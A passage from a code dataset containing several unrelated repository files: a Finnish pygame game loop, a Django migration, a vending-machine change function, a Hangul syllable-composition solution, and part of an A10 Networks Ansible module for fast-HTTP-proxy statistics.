kivi_list if x.onko_ollut_pohjalla==False]\n\n monsteri_list = [x for x in monsteri_list if x.onko_ollut_pohjalla==False]\n\n \n\n # siirretään kiveä/rahaa ja monsteria alas\n\n for stone in kivi_list:\n\n move_kivi(stone)\n\n \n\n for monsteri in monsteri_list:\n\n move_kivi(monsteri)\n\n \n\n # katsotaan tuliko osuma ja lisätään pisteitä\n\n drop_indices=[]\n\n for i,stone in enumerate(kivi_list):\n\n if (x_r-w_k <= stone.x <= x_r+w_r) and (y_r-h_k <= stone.y <= y_r+h_r):\n\n drop_indices.append(i)\n\n pisteet+=1\n\n \n\n # poistetaan ne kivet/rahat joihin osunut\n\n kivi_list = [j for i, j in enumerate(kivi_list) if i not in drop_indices]\n\n \n\n # katsotaan osuiku monsteriin ja asetetaan game_over parameteri todeksi tarvittaessa\n\n for i,monster in enumerate(monsteri_list):\n\n if (x_r-w_m <= monster.x <= x_r+w_r) and (y_r-h_m <= monster.y <= y_r+h_r): #NB!\n\n game_over=True\n\n break\n\n \n\n # poistetaan kivet/rahat ja monsterit jos peli päättynyt\n\n if game_over==True or victory==True:\n\n kivi_list=[]\n\n monsteri_list=[]\n\n \n\n # alustetaan tekstit\n\n ## pisteteksti\n\n fontti = pygame.font.SysFont(\"Arial\", 24)\n\n teksti = fontti.render(f'Pisteet: {pisteet}', True, (255, 0, 0))\n\n \n\n ## häviämistekstit\n\n fontti_game_over = pygame.font.SysFont(\"Arial\", 70)\n\n teksti_game_over = fontti_game_over.render(f'Game over!', True, (255, 0, 0))\n\n \n\n ##voittotekstit\n\n teksti_victory1 = fontti_game_over.render(f'Sinä voitit!', True, (255, 0, 0))\n\n teksti_victory2 = fontti.render(f'Käräsit {pisteet} rahaa, olet rikas. Onneksi olkoon.', True, (255, 0, 0))\n\n \n\n # mikäli pisteitä on 5 (tai enemmän), peli voitetaan\n\n if pisteet>=5:\n\n victory=True\n\n \n\n ########################\n\n # piirretään näyttöön grafiikat jokaiselle tapahtumalle\n\n naytto.fill((72,61,139))\n\n pygame.display.set_caption('Rikkaaksi kuoleman uhalla')\n\n if game_over==True:\n\n naytto.blit(teksti_game_over, (w_d/2-160, h_d/2-80))\n\n naytto.blit(teksti, (w_d/2-50, h_d/2+50))\n\n \n\n elif victory==True:\n\n naytto.blit(teksti_victory1, (w_d/2-160, h_d/2-80))\n\n naytto.blit(teksti_victory2, (100, h_d/2+50))\n\n \n\n else: \n\n for x in kivi_list:\n\n display_kivi(x)\n\n for x in monsteri_list:\n\n display_monsteri(x)\n\n naytto.blit(teksti, (w_d-120, 0))\n\n \n\n naytto.blit(robo, (x_r, y_r))\n\n pygame.display.flip()\n\n kello.tick(60*nopeus)","repo_name":"sami-one/mooc-ohjelmointi-21","sub_path":"osa14-01_pelin_palautus/src/arviointi.py","file_name":"arviointi.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"fi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19731371904","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0003_auto_20150311_1336'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='task',\n options={'ordering': ['-status', 'priority', 'progress'], 'verbose_name': '\\u9879\\u76ee\\u4efb\\u52a1\\u4fe1\\u606f', 'verbose_name_plural': '\\u9879\\u76ee\\u4efb\\u52a1\\u4fe1\\u606f'},\n ),\n migrations.AlterField(\n model_name='task',\n name='description',\n field=models.TextField(help_text=b'issue \\xe5\\x86\\x85\\xe5\\xae\\xb9', max_length=100, verbose_name='\\u8be6\\u60c5'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='task',\n name='due_date',\n field=models.DateTimeField(help_text=b'\\xe5\\xae\\x8c\\xe6\\x88\\x90\\xe6\\x97\\xa5\\xe6\\x9c\\x9f', null=True, verbose_name='\\u5b8c\\u6210\\u65e5\\u671f', blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='task',\n name='plan_date',\n field=models.DateTimeField(help_text=b'\\xe4\\xbb\\xbb\\xe5\\x8a\\xa1\\xe6\\x88\\xaa\\xe6\\xad\\xa2\\xe6\\x97\\xa5\\xe6\\x9c\\x9f', null=True, verbose_name='\\u622a\\u6b62\\u65e5\\u671f', blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='task',\n name='progress',\n field=models.IntegerField(default=0, help_text=b'%', max_length=2, verbose_name='\\u8fdb\\u5ea6'),\n preserve_default=True,\n ),\n ]\n","repo_name":"sparrowu93/django-ProjectManagement","sub_path":"base/migrations/0004_auto_20150318_1602.py","file_name":"0004_auto_20150318_1602.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38896906359","text":"\"\"\"\nA virtual vending machine.\n\"\"\"\n# A list of coins allowed\nACCEPTABLE_COINS = [1000, 500, 200, 100, 20, 10, 5, 2, 1]\n\n\ndef return_change(balance):\n \"\"\"\n Returns balance in coins.\n \"\"\"\n change = []\n\n while balance > 0:\n for coin in ACCEPTABLE_COINS:\n if balance % coin == 0:\n change.append(coin)\n balance -= coin\n break\n\n return sorted(change, reverse=True)\n","repo_name":"heenabaheti/python-programs","sub_path":"junit_testing_programs/vending_mach.py","file_name":"vending_mach.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7054784559","text":"# Problem No.: 11285\r\n# Solver: Jinmin Goh\r\n# Date: 20220811\r\n# URL: https://www.acmicpc.net/problem/11285\r\n\r\nimport sys\r\n\r\ndef main():\r\n first_word = input().rstrip()\r\n middle_word = input().rstrip()\r\n last_word = input().rstrip()\r\n first_list = ['ㄱ', 'ㄲ', 'ㄴ', 'ㄷ', 'ㄸ', 'ㄹ', 'ㅁ', 'ㅂ', 'ㅃ', 'ㅅ', 'ㅆ', 'ㅇ', 'ㅈ', 'ㅉ', 'ㅊ', 'ㅋ', 'ㅌ', 'ㅍ', 'ㅎ']\r\n middle_list = ['ㅏ', 'ㅐ', 'ㅑ', 'ㅒ', 'ㅓ', 'ㅔ', 'ㅕ', 'ㅖ', 'ㅗ', 'ㅘ', 'ㅙ', 'ㅚ', 'ㅛ', 'ㅜ', 'ㅝ', 'ㅞ', 'ㅟ', 'ㅠ', 'ㅡ', 'ㅢ', 'ㅣ']\r\n last_list = ['', 'ㄱ', 'ㄲ', 'ㄳ', 'ㄴ', 'ㄵ', 'ㄶ', 'ㄷ', 'ㄹ', 'ㄺ', 'ㄻ', 'ㄼ', 'ㄽ', 'ㄾ', 'ㄿ', 'ㅀ', 'ㅁ', 'ㅂ', 'ㅄ', 'ㅅ', 'ㅆ', 'ㅇ', 'ㅈ', 'ㅊ', 'ㅋ', 'ㅌ', 'ㅍ', 'ㅎ']\r\n \r\n first_idx = first_list.index(first_word)\r\n middle_idx = middle_list.index(middle_word)\r\n last_idx = last_list.index(last_word)\r\n idx = first_idx * (len(middle_list) * len(last_list)) + middle_idx * len(last_list) + last_idx + 44032\r\n print(chr(idx))\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/11285/11285.py","file_name":"11285.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86415314294","text":"REQUIRED_NOT_SET = (False, \"One of ({}) must be set.\")\nREQUIRED_MUTEX = (False, \"Only one of ({}) can be set.\")\nREQUIRED_VALID = (True, \"\")\n\nDOCUMENTATION = r'''\nmodule: a10_slb_fast_http_proxy\ndescription:\n - Configure Fast-HTTP Proxy\nauthor: A10 Networks\noptions:\n state:\n description:\n - State of the object to be created.\n choices:\n - noop\n - present\n - absent\n type: str\n required: True\n ansible_host:\n description:\n - Host for AXAPI authentication\n type: str\n required: True\n ansible_username:\n description:\n - Username for AXAPI authentication\n type: str\n required: True\n ansible_password:\n description:\n - Password for AXAPI authentication\n type: str\n required: True\n ansible_port:\n description:\n - Port for AXAPI authentication\n type: int\n required: True\n a10_device_context_id:\n description:\n - Device ID for aVCS configuration\n choices: [1-8]\n type: int\n required: False\n a10_partition:\n description:\n - Destination/target partition for object/command\n type: str\n required: False\n uuid:\n description:\n - \"uuid of the object\"\n type: str\n required: False\n sampling_enable:\n description:\n - \"Field sampling_enable\"\n type: list\n required: False\n suboptions:\n counters1:\n description:\n - \"'all'= all; 'num'= Num; 'curr_proxy'= Curr Proxy Conns; 'total_proxy'= Total\n Proxy Conns; 'req'= HTTP requests; 'req_succ'= HTTP requests(succ); 'noproxy'=\n No proxy error; 'client_rst'= Client RST; 'server_rst'= Server RST; 'notuple'=\n No tuple error; 'parsereq_fail'= Parse req fail; 'svrsel_fail'= Server\n selection fail; 'fwdreq_fail'= Fwd req fail; 'fwdreq_fail_buff'= Fwd req fail -\n buff; 'fwdreq_fail_rport'= Fwd req fail - rport; 'fwdreq_fail_route'= Fwd req\n fail - route; 'fwdreq_fail_persist'= Fwd req fail - persist;\n 'fwdreq_fail_server'= Fwd req fail - server; 'fwdreq_fail_tuple'= Fwd req fail\n - tuple; 'fwdreqdata_fail'= Fwd req data fail; 'req_retran'= Packets retrans;\n 'req_ofo'= Packets ofo; 'server_resel'= Server reselection; 'svr_prem_close'=\n Server premature close; 'new_svrconn'= Server conn made; 'snat_fail'= Source\n NAT failure; 'tcpoutrst'= Out RSTs; 'full_proxy'= Full proxy tot;\n 'full_proxy_post'= Full proxy POST; 'full_proxy_pipeline'= Full proxy pipeline;\n 'full_proxy_fpga_err'= Full proxy fpga err; 'req_over_limit'= Request over\n limit; 'req_rate_over_limit'= Request rate over limit; 'l4_switching'= L4\n switching; 'cookie_switching'= Cookie switching; 'aflex_switching'= aFleX\n switching; 'http_policy_switching'= HTTP Policy switching; 'url_switching'= URL\n switching; 'host_switching'= Host switching; 'lb_switching'= Normal LB\n switching; 'l4_switching_ok'= L4 switching (succ); 'cookie_switching_ok'=\n Cookie switching (succ); 'aflex_switching_ok'= aFleX switching (succ);\n 'http_policy_switching_ok'= HTTP Policy switching (succ); 'url_switching_ok'=\n URL switching (succ); 'host_switching_ok'= Host switching (succ);\n 'lb_switching_ok'= Normal LB switch. (succ); 'l4_switching_enqueue'= L4\n switching (enQ); 'cookie_switching_enqueue'= Cookie switching (enQ);\n 'aflex_switching_enqueue'= aFleX switching (enQ);\n 'http_policy_switching_enqueue'= HTTP Policy switching (enQ);\n 'url_switching_enqueue'= URL switching (enQ); 'host_switching_enqueue'= Host\n switching (enQ); 'lb_switching_enqueue'= Normal LB switch. (enQ); 'retry_503'=\n Retry on 503; 'aflex_retry'= aFleX http retry; 'aflex_lb_reselect'= aFleX lb\n reselect; 'aflex_lb_reselect_ok'= aFleX lb reselect (succ);\n 'client_rst_request'= Client RST - request; 'client_rst_connecting'= Client RST\n - connecting; 'client_rst_connected'= Client RST - connected;\n 'client_rst_response'= Client RST - response; 'server_rst_request'= Server RST\n - request; 'server_rst_connecting'= Server RST - connecting;\n 'server_rst_connected'= Server RST - connected; 'server_rst_response'= Server\n RST - response; 'invalid_header'= Invalid header; 'too_many_headers'= Too many\n headers; 'line_too_long'= Line too long; 'header_name_too_long'= Header name\n too long; 'wrong_resp_header'= Wrong response header; 'header_insert'= Header\n insert; 'header_delete'= Header delete; 'insert_client_ip'= Insert client IP;\n 'negative_req_remain'= Negative request remain; 'negative_resp_remain'=\n Negative response remain; 'large_cookie'= Large cookies; 'large_cookie_header'=\n Large cookie headers; 'huge_cookie'= Huge cookies; 'huge_cookie_header'= Huge\n cookie headers; 'parse_cookie_fail'= Parse cookie fail; 'parse_setcookie_fail'=\n Parse set-cookie fail; 'asm_cookie_fail'= Assemble cookie fail;\n 'asm_cookie_header_fail'= Asm cookie header fail; 'asm_setcookie_fail'=\n Assemble set-cookie fail; 'asm_setcookie_header_fail'= Asm set-cookie hdr fail;\n 'client_req_unexp_flag'= Client req unexp flags; 'connecting_fin'= Connecting\n FIN; 'connecting_fin_retrans'= Connecting FIN retran; 'connecting_fin_ofo'=\n Connecting FIN ofo; 'connecting_rst'= Connecting RST; 'connecting_rst_retrans'=\n Connecting RST retran; 'connecting_rst_ofo'= Connecting RST ofo;\n 'connecting_ack'= Connecting ACK; 'pkts_ofo'= Packets ofo; 'pkts_retrans'=\n Packets retrans; 'pkts_retrans_ack_finwait'= retrans ACK FWAIT;\n 'pkts_retrans_fin'= retrans FIN; 'pkts_retrans_rst'= retrans RST;\n 'pkts_retrans_push'= retrans PSH; 'stale_sess'= Stale sess;\n 'server_resel_failed'= Server re-select failed; 'compression_before'= Tot data\n before compress; 'compression_after'= Tot data after compress; 'response_1xx'=\n Status code 1XX; 'response_100'= Status code 100; 'response_101'= Status code\n 101; 'response_102'= Status code 102; 'response_2xx'= Status code 2XX;\n 'response_200'= Status code 200; 'response_201'= Status code 201;\n 'response_202'= Status code 202; 'response_203'= Status code 203;\n 'response_204'= Status code 204; 'response_205'= Status code 205;\n 'response_206'= Status code 206; 'response_207'= Status code 207;\n 'response_3xx'= Status code 3XX; 'response_300'= Status code 300;\n 'response_301'= Status code 301; 'response_302'= Status code 302;\n 'response_303'= Status code 303; 'response_304'= Status code 304;\n 'response_305'= Status code 305; 'response_306'= Status code 306;\n 'response_307'= Status code 307; 'response_4xx'= Status code 4XX;\n 'response_400'= Status code 400; 'response_401'= Status code 401;\n 'response_402'= Status code 402; 'response_403'= Status code 403;\n 'response_404'= Status code 404; 'response_405'= Status code 405;\n 'response_406'= Status code 406; 'response_407'= Status code 407;\n 'response_408'= Status code 408; 'response_409'= Status code 409;\n 'response_410'= Status code 410; 'response_411'= Status code 411;\n 'response_412'= Status code 412; 'response_413'= Status code 413;\n 'response_414'= Status code 414; 'response_415'= Status code 415;\n 'response_416'= Status code 416; 'response_417'= Status code 417;\n 'response_418'= Status code 418; 'response_422'= Status code 422;\n 'response_423'= Status code 423; 'response_424'= Status code 424;\n 'response_425'= Status code 425; 'response_426'= Status code 426;\n 'response_449'= Status code 449; 'response_450'= Status code 450;\n 'response_5xx'= Status code 5XX; 'response_500'= Status code 500;\n 'response_501'= Status code 501; 'response_502'= Status code 502;\n 'response_503'= Status code 503; 'response_504'= Status code 504;\n 'response_505'= Status code 505; 'response_506'= Status code 506;\n 'response_507'= Status code 507; 'response_508'= Status code 508;\n 'response_509'= Status code 509; 'response_510'= Status code 510;\n 'response_6xx'= Status code 6XX; 'response_unknown'= Status code unknown;\n 'req_http10'= Request 1.0; 'req_http11'= Request 1.1; 'response_http10'= Resp\n 1.0; 'response_http11'= Resp 1.1; 'req_get'= Method GET; 'req_head'= Method\n HEAD; 'req_put'= Method PUT; 'req_post'= Method POST; 'req_trace'= Method\n TRACE; 'req_options'= Method OPTIONS; 'req_connect'= Method CONNECT;\n 'req_delete'= Method DELETE; 'req_unknown'= Method UNKNOWN; 'req_content_len'=\n Req content len; 'rsp_content_len'= Resp content len; 'rsp_chunk'= Resp chunk\n encoding; 'req_chunk'= Req chunk encoding; 'compress_rsp'= Compress req;\n 'compress_del_accept_enc'= Compress del accept enc;\n 'compress_resp_already_compressed'= Resp already compressed;\n 'compress_content_type_excluded'= Compress cont type excl;\n 'compress_no_content_type'= Compress no cont type; 'compress_resp_lt_min'=\n Compress resp less than min; 'compress_resp_no_cl_or_ce'= Compress resp no\n CL/CE; 'compress_ratio_too_high'= Compress ratio too high; 'cache_rsp'= HTTP\n req (cache succ); 'close_on_ddos'= Close on DDoS; 'req_http10_keepalive'= 1.0\n Keepalive; 'req_sz_1k'= Req less than equal to 1K; 'req_sz_2k'= Req less than\n equal to 2K;\"\n type: str\n counters2:\n description:\n - \"'req_sz_4k'= Req less than equal to 4K; 'req_sz_8k'= Req less than equal to 8K;\n 'req_sz_16k'= Req less than equal to 16K; 'req_sz_32k'= Req less than equal to\n 32K; 'req_sz_64k'= Req less than equal to 64K; 'req_sz_256k'= Req less than\n equal to 256K; 'req_sz_gt_256k'= Req greater than 256K; 'rsp_sz_1k'= Resp less\n than equal to 1K; 'rsp_sz_2k'= Resp less than equal to 2K; 'rsp_sz_4k'= Resp\n less than equal to 4K; 'rsp_sz_8k'= Resp less than equal to 8K; 'rsp_sz_16k'=\n Resp less than equal to 16K; 'rsp_sz_32k'= Resp less than equal to 32K;\n 'rsp_sz_64k'= Resp less than equal to 64K; 'rsp_sz_256k'= Resp less than equal\n to 256K; 'rsp_sz_gt_256k'= Resp greater than 256K; 'chunk_sz_512'= Chunk less\n than equal to 512; 'chunk_sz_1k'= Chunk less than equal to 1K; 'chunk_sz_2k'=\n Chunk less than equal to 2K; 'chunk_sz_4k'= Chunk less than equal to 4K;\n 'chunk_sz_gt_4k'= Chunk greater than 4K; 'pconn_connecting'= pconn connecting;\n 'pconn_connected'= pconn connected; 'pconn_connecting_failed'= pconn conn\n failed; 'chunk_bad'= Bad Chunk; 'req_10u'= Rsp time less than 10u; 'req_20u'=\n Rsp time less than 20u; 'req_50u'= Rsp time less than 50u; 'req_100u'= Rsp time\n less than 100u; 'req_200u'= Rsp time less than 200u; 'req_500u'= Rsp time less\n than 500u; 'req_1m'= Rsp time less than 1m; 'req_2m'= Rsp time less than 2m;\n 'req_5m'= Rsp time less than 5m; 'req_10m'= Rsp time less than 10m; 'req_20m'=\n Rsp time less than 20m; 'req_50m'= Rsp time less than 50m; 'req_100m'= Rsp time\n less than 100m; 'req_200m'= Rsp time less than 200m; 'req_500m'= Rsp time less\n than 500m; 'req_1s'= Rsp time less than 1s; 'req_2s'= Rsp time less than 2s;\n 'req_5s'= Rsp time less than 5s; 'req_over_5s'= Rsp time greater than equal to\n 5s; 'insert_client_port'= Insert client Port; 'req_track'= Method TRACK;\n 'full_proxy_put'= Full proxy PUT; 'non_http_bypass'= Non-HTTP bypass;\n 'skip_insert_client_ip'= Skip Insert Client IP; 'skip_insert_client_port'= Skip\n Insert Client Port; 'decompression_before'= Tot data before decompress;\n 'decompression_after'= Tot data after decompress; 'http_pkts_in_seq'= Tot In-\n seq fHTTP packets; 'http_pkts_retx'= Tot Re-Tx fHTTP packets;\n 'http_client_retx'= Client Re-Tx fHTTP packets; 'http_server_retx'= Server Re-\n Tx fHTTP packets; 'http_pkts_ofo'= fHTTP Out of Order packets;\"\n type: str\n oper:\n description:\n - \"Field oper\"\n type: dict\n required: False\n suboptions:\n fast_http_proxy_cpu_list:\n description:\n - \"Field fast_http_proxy_cpu_list\"\n type: list\n cpu_count:\n description:\n - \"Field cpu_count\"\n type: int\n debug_fields:\n description:\n - \"Field debug_fields\"\n type: bool\n stats:\n description:\n - \"Field stats\"\n type: dict\n required: False\n suboptions:\n curr_proxy:\n description:\n - \"Curr Proxy Conns\"\n type: str\n total_proxy:\n description:\n - \"Total Proxy Conns\"\n type: str\n req:\n description:\n - \"HTTP requests\"\n type: str\n req_succ:\n description:\n - \"HTTP requests(succ)\"\n type: str\n noproxy:\n description:\n - \"No proxy error\"\n type: str\n client_rst:\n description:\n - \"Client RST\"\n type: str\n server_rst:\n description:\n - \"Server RST\"\n type: str\n notuple:\n description:\n - \"No tuple error\"\n type: str\n parsereq_fail:\n description:\n - \"Parse req fail\"\n type: str\n svrsel_fail:\n description:\n - \"Server selection fail\"\n type: str\n fwdreq_fail:\n description:\n - \"Fwd req fail\"\n type: str\n fwdreqdata_fail:\n description:\n - \"Fwd req data fail\"\n type: str\n req_retran:\n description:\n - \"Packets retrans\"\n type: str\n req_ofo:\n description:\n - \"Packets ofo\"\n type: str\n server_resel:\n description:\n - \"Server reselection\"\n type: str\n svr_prem_close:\n description:\n - \"Server premature close\"\n type: str\n new_svrconn:\n description:\n - \"Server conn made\"\n type: str\n snat_fail:\n description:\n - \"Source NAT failure\"\n type: str\n tcpoutrst:\n description:\n - \"Out RSTs\"\n type: str\n full_proxy:\n description:\n - \"Full proxy tot\"\n type: str\n full_proxy_post:\n description:\n - \"Full proxy POST\"\n type: str\n full_proxy_pipeline:\n description:\n - \"Full proxy pipeline\"\n type: str\n full_proxy_fpga_err:\n description:\n - \"Full proxy fpga err\"\n type: str\n req_over_limit:\n description:\n - \"Request over limit\"\n type: str\n req_rate_over_limit:\n description:\n - \"Request rate over limit\"\n type: str\n close_on_ddos:\n description:\n - \"Close on DDoS\"\n type: str\n full_proxy_put:\n description:\n - \"Full proxy PUT\"\n type: str\n\n'''\n\nRETURN = r'''\nmodified_values:\n description:\n - Values modified (or potential changes if using check_mode) as a result of task operation\n returned: changed\n type: dict\naxapi_calls:\n description: Sequential list of AXAPI calls made by the task\n returned: always\n type: list\n elements: dict\n contains:\n endpoint:\n description: The AXAPI endpoint being accessed.\n type: str\n sample:\n - /axapi/v3/slb/virtual_server\n - /axapi/v3/file/ssl-cert\n http_method:\n description:\n - HTTP method being used by the primary task to interact with the AXAPI endpoint.\n type: str\n sample:\n - POST\n - GET\n request_body:\n description: Params used to query the AXAPI\n type: complex\n response_body:\n description: Response from the AXAPI\n type: complex\n'''\n\nEXAMPLES = \"\"\"\n\"\"\"\n\nimport copy\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils import \\\n errors as a10_ex\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils import \\\n wrapper as api_client\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils import \\\n utils\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils.client import \\\n client_factory\nfrom ansible_collections.a10.acos_axapi.plugins.module_utils.kwbl import \\\n KW_OUT, translate_blacklist as translateBlacklist\n\n# Hacky way of having access to object properties for evaluation\nAVAILABLE_PROPERTIES = [\"oper\", \"sampling_enable\", \"stats\", \"uuid\", ]\n\n\ndef get_default_argspec():\n return dict(\n ansible_host=dict(type='str', required=True),\n ansible_username=dict(type='str', required=True),\n ansible_password=dict(type='str', required=True, no_log=True),\n state=dict(type='str', default=\"present\", choices=['noop', 'present', 'absent']),\n ansible_port=dict(type='int', choices=[80, 443], required=True),\n a10_partition=dict(type='str', required=False,\n ),\n a10_device_context_id=dict(type='int', choices=[1, 2, 3, 4, 5, 6, 7, 8], required=False,\n ),\n get_type=dict(type='str', choices=[\"single\", \"list\", \"oper\", \"stats\"]),\n )\n\n\ndef get_argspec():\n rv = get_default_argspec()\n rv.update({\n 'uuid': {\n 'type': 'str',\n },\n 'sampling_enable': {\n 'type': 'list',\n 'counters1': {\n 'type':\n 'str',\n 'choices': [\n 'all', 'num', 'curr_proxy', 'total_proxy', 'req', 'req_succ', 'noproxy', 'client_rst', 'server_rst', 'notuple', 'parsereq_fail', 'svrsel_fail', 'fwdreq_fail', 'fwdreq_fail_buff', 'fwdreq_fail_rport', 'fwdreq_fail_route', 'fwdreq_fail_persist', 'fwdreq_fail_server', 'fwdreq_fail_tuple', 'fwdreqdata_fail', 'req_retran', 'req_ofo',\n 'server_resel', 'svr_prem_close', 'new_svrconn', 'snat_fail', 'tcpoutrst', 'full_proxy', 'full_proxy_post', 'full_proxy_pipeline', 'full_proxy_fpga_err', 'req_over_limit', 'req_rate_over_limit', 'l4_switching', 'cookie_switching', 'aflex_switching', 'http_policy_switching', 'url_switching', 'host_switching', 'lb_switching',\n 'l4_switching_ok', 'cookie_switching_ok', 'aflex_switching_ok', 'http_policy_switching_ok', 'url_switching_ok', 'host_switching_ok', 'lb_switching_ok', 'l4_switching_enqueue', 'cookie_switching_enqueue', 'aflex_switching_enqueue', 'http_policy_switching_enqueue', 'url_switching_enqueue', 'host_switching_enqueue',\n 'lb_switching_enqueue', 'retry_503', 'aflex_retry', 'aflex_lb_reselect', 'aflex_lb_reselect_ok', 'client_rst_request', 'client_rst_connecting', 'client_rst_connected', 'client_rst_response', 'server_rst_request', 'server_rst_connecting', 'server_rst_connected', 'server_rst_response', 'invalid_header', 'too_many_headers',\n 'line_too_long', 'header_name_too_long', 'wrong_resp_header', 'header_insert', 'header_delete', 'insert_client_ip', 'negative_req_remain', 'negative_resp_remain', 'large_cookie', 'large_cookie_header', 'huge_cookie', 'huge_cookie_header', 'parse_cookie_fail', 'parse_setcookie_fail', 'asm_cookie_fail', 'asm_cookie_header_fail',\n 'asm_setcookie_fail', 'asm_setcookie_header_fail', 'client_req_unexp_flag', 'connecting_fin', 'connecting_fin_retrans', 'connecting_fin_ofo', 'connecting_rst', 'connecting_rst_retrans', 'connecting_rst_ofo', 'connecting_ack', 'pkts_ofo', 'pkts_retrans', 'pkts_retrans_ack_finwait', 'pkts_retrans_fin', 'pkts_retrans_rst',\n 'pkts_retrans_push', 'stale_sess', 'server_resel_failed', 'compression_before', 'compression_after', 'response_1xx', 'response_100', 'response_101', 'response_102', 'response_2xx', 'response_200', 'response_201', 'response_202', 'response_203', 'response_204', 'response_205', 'response_206', 'response_207', 'response_3xx',\n 'response_300', 'response_301', 'response_302', 'response_303', 'response_304', 'response_305', 'response_306', 'response_307', 'response_4xx', 'response_400', 'response_401', 'response_402', 'response_403', 'response_404', 'response_405', 'response_406', 'response_407', 'response_408', 'response_409', 'response_410',\n 'response_411', 'response_412', 'response_413', 'response_414', 'response_415', 'response_416', 'response_417', 'response_418', 'response_422', 'response_423', 'response_424', 'response_425', 'response_426', 'response_449', 'response_450', 'response_5xx', 'response_500', 'response_501', 'response_502', 'response_503',\n 'response_504', 'response_505', 'response_506', 'response_507', 'response_508', 'response_509', 'response_510', 'response_6xx', 'response_unknown', 'req_http10', 'req_http11', 'response_http10', 'response_http11', 'req_get', 'req_head', 'req_put', 'req_post', 'req_trace', 'req_options', 'req_connect', 'req_delete',\n 'req_unknown', 'req_content_len', 'rsp_content_len', 'rsp_chunk', 'req_chunk', 'compress_rsp', 'compress_del_accept_enc', 'compress_resp_already_compressed', 'compress_content_type_excluded', 'compress_no_content_type', 'compress_resp_lt_min', 'compress_resp_no_cl_or_ce', 'compress_ratio_too_high', 'cache_rsp', 'close_on_ddos',\n 'req_http10_keepalive', 'req_sz_1k', 'req_sz_2k'\n ]\n },\n 'counters2': {\n 'type':\n 'str',\n 'choices': [\n 'req_sz_4k', 'req_sz_8k', 'req_sz_16k', 'req_sz_32k', 'req_sz_64k', 'req_sz_256k', 'req_sz_gt_256k', 'rsp_sz_1k', 'rsp_sz_2k', 'rsp_sz_4k', 'rsp_sz_8k', 'rsp_sz_16k', 'rsp_sz_32k', 'rsp_sz_64k', 'rsp_sz_256k', 'rsp_sz_gt_256k', 'chunk_sz_512', 'chunk_sz_1k', 'chunk_sz_2k', 'chunk_sz_4k', 'chunk_sz_gt_4k', 'pconn_connecting',\n 'pconn_connected', 'pconn_connecting_failed', 'chunk_bad', 'req_10u', 'req_20u', 'req_50u', 'req_100u', 'req_200u', 'req_500u', 'req_1m', 'req_2m', 'req_5m', 'req_10m', 'req_20m', 'req_50m', 'req_100m', 'req_200m', 'req_500m', 'req_1s', 'req_2s', 'req_5s', 'req_over_5s', 'insert_client_port', 'req_track', 'full_proxy_put',\n 'non_http_bypass', 'skip_insert_client_ip', 'skip_insert_client_port', 'decompression_before', 'decompression_after', 'http_pkts_in_seq', 'http_pkts_retx', 'http_client_retx', 'http_server_retx', 'http_pkts_ofo'\n ]\n }\n },\n 'oper': {\n 'type': 'dict',\n 'fast_http_proxy_cpu_list': {\n 'type': 'list',\n 'curr_proxy': {\n 'type': 'int',\n },\n 'total_proxy': {\n 'type': 'int',\n },\n 'req': {\n 'type': 'int',\n },\n 'req_succ': {\n 'type': 'int',\n },\n 'noproxy': {\n 'type': 'int',\n },\n 'client_rst': {\n 'type': 'int',\n },\n 'server_rst': {\n 'type': 'int',\n },\n 'notuple': {\n 'type': 'int',\n },\n 'parsereq_fail': {\n 'type': 'int',\n },\n 'svrsel_fail': {\n 'type': 'int',\n },\n 'fwdreq_fail': {\n 'type': 'int',\n },\n 'fwdreq_fail_buff': {\n 'type': 'int',\n },\n 'fwdreq_fail_rport': {\n 'type': 'int',\n },\n 'fwdreq_fail_route': {\n 'type': 'int',\n },\n 'fwdreq_fail_persist': {\n 'type': 'int',\n },\n 'fwdreq_fail_server': {\n 'type': 'int',\n },\n 'fwdreq_fail_tuple': {\n 'type': 'int',\n },\n 'fwdreqdata_fail': {\n 'type': 'int',\n },\n 'req_retran': {\n 'type': 'int',\n },\n 'req_ofo': {\n 'type': 'int',\n },\n 'server_resel': {\n 'type': 'int',\n },\n 'svr_prem_close': {\n 'type': 'int',\n },\n 'new_svrconn': {\n 'type': 'int',\n },\n 'snat_fail': {\n 'type': 'int',\n },\n 'tcpoutrst': {\n 'type': 'int',\n },\n 'full_proxy': {\n 'type': 'int',\n },\n 'full_proxy_post': {\n 'type': 'int',\n },\n 'full_proxy_put': {\n 'type': 'int',\n },\n 'full_proxy_pipeline': {\n 'type': 'int',\n },\n 'full_proxy_fpga_err': {\n 'type': 'int',\n },\n 'req_over_limit': {\n 'type': 'int',\n },\n 'req_rate_over_limit': {\n 'type': 'int',\n },\n 'l4_switching': {\n 'type': 'int',\n },\n 'cookie_switching': {\n 'type': 'int',\n },\n 'aflex_switching': {\n 'type': 'int',\n },\n 'url_switching': {\n 'type': 'int',\n },\n 'host_switching': {\n 'type': 'int',\n },\n 'lb_switching': {\n 'type': 'int',\n },\n 'l4_switching_ok': {\n 'type': 'int',\n },\n 'cookie_switching_ok': {\n 'type': 'int',\n },\n 'aflex_switching_ok': {\n 'type': 'int',\n },\n 'url_switching_ok': {\n 'type': 'int',\n },\n 'host_switching_ok': {\n 'type': 'int',\n },\n 'lb_switching_ok': {\n 'type': 'int',\n },\n 'l4_switching_enqueue': {\n 'type': 'int',\n },\n 'cookie_switching_enqueue': {\n 'type': 